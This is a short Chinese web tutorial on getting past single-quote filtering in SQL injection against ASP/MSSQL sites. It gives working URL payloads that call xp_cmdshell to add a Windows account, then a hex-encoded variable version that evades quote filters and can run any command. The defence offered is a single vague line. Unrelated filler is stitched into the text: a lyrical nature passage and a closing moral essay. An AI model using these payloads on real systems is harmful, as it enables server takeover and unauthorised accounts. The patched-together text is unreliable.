SQL注入中绕过 单引号 限制继续注入

在小溪的淙淙声中,饱含树脂的幼芽在开放,水下的草长出水面,岸上青草越发繁茂。雨滴从屋檐、墙头、树叶上跌下,就如同断了线的珠子一样,最后连在一起,形成水柱。
包括我写的那篇《SQL Injection的实现与应用》也是这样的例子,因为没有碰到任何的过滤,所以使我们相当轻松就注入成功了,如下:
 
//www.haodaima.com/show.asp?id=1;exec master.dbo.xp_cmdshell 'net user angel pass /add';--

这往往给大家造成误解,认为只要变量过滤了'就可以防止SQL Injection攻击,这种意识为大量程序可以注入埋下祸根,其实仅仅过滤'是不够的,在'被过滤的情况下我们照样玩,看下面语句:
 
//www.haodaima.com/show.asp?id=1;declare%20@a%20sysname%20select%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a;--

  是不是跟上面的那句有很大区别?可是效果完全是一样的。其实这些都是SQL语句。
 
0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400

这句是“net user angel pass /add”的16进制格式。了解SQL的朋友就容易明白,先声明一个变量a,然后把我们的指令赋值给a,然后调用变量a最终执行我们输入的命令。变量a可以是任何命令。如下:
 
declare @a sysname
select @a=
exec master.dbo.xp_cmdshell @a

解决办法:
过滤变量,限制只允许输入特定字符。比如对于数字类型的变量就限制只能输入数字类型的数据。具体就不说了。这完全是程序作者自由发挥了。

本文SQL注入中绕过 单引号 限制继续注入到此结束。人生如棋,仅有舍弃一些棋子,才能换得一生的平静和幸福。上帝是公平的,冬天里失去的东西,到春天的时候会还给你;这方面舍弃的东西,在另一方面会补给你。舍与得,其实是一个无限循环的圈。越敢舍,越能得;越愿舍,越易得。舍得之间,人生迥异,以舍为得,妙用无穷!小编再次感谢大家对我们的支持!

您可能有感兴趣的文章
ASP.NET中Response.BufferOutput属性的使用技巧

ASP.NET轻量级MVC框架Nancy的基本用法

使用grpcui测试ASP.NET core的gRPC服务

ASP.NET Core中的对象池介绍

.NET集成ORM框架HiSql